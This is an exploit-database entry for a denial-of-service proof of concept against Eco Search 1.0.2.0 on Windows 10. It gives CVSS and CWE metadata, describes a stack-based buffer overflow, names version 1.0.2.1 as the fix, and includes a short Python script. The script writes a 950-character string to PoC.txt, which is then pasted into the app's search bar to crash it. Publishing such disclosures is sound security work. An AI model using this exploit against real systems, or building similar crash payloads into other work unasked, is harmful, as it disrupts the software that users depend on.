Eco Search 1.0.2.0 - Denial of Service (PoC)

vendor:

Eco Search

by:

0xB9

7.5

CVSS

HIGH

Denial of Service

119

CWE

Product Name: Eco Search

Affected Version From: 1.0.2.0

Affected Version To: 1.0.2.0

Patch Exists: YES

Related CWE: N/A

CPE: a:microsoft:eco_search

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10

2018

Eco Search 1.0.2.0 – Denial of Service (PoC)

A buffer overflow vulnerability exists in Eco Search 1.0.2.0, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to a boundary error when handling user-supplied input. This can be exploited to cause a stack-based buffer overflow via an overly long, specially crafted string passed to the affected application. Successful exploitation of this vulnerability may allow execution of arbitrary code, but this has not been confirmed.

Mitigation:

Upgrade to version 1.0.2.1 or later.

Source

Exploit-DB raw data:

# Exploit Title: Eco Search 1.0.2.0 - Denial of Service (PoC)
# Date: 1/18/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9N05DCQP5C3W
# Version: 1.0.2.0
# Tested on: Windows 10

# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the search bar and click search
# App will now crash

buffer = "A" * 950
payload = buffer
try:
    f=open("PoC.txt","w")
    print "[+] Creating %s evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"